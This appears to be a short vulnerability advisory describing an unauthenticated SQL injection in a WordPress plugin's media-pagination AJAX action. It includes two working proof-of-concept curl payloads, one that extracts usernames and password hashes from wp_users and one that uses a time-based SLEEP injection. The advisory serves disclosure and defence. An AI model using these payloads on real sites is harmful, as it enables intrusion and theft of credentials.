The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection
curl 'https://example.com/wp-admin/admin-ajax.php' \ --data "action=youzify_media_pagination&data[type]=photos&page=1&data[group_id]=1 UNION ALL SELECT (SELECT CONCAT(user_login,CHAR(0x3a),user_pass) from wp_users),2,3,4-- -" time curl 'https://example.com/wp-admin/admin-ajax.php' \ --data "action=youzify_media_pagination&data[type]=photos&page=1&data[group_id]=(SELECT 7958 FROM (SELECT(SLEEP(5)))XVfJ)"
cydave
cydave
Yes
2022-07-11 (about 8 months ago)
2022-07-11 (about 8 months ago)
2022-07-11 (about 8 months ago)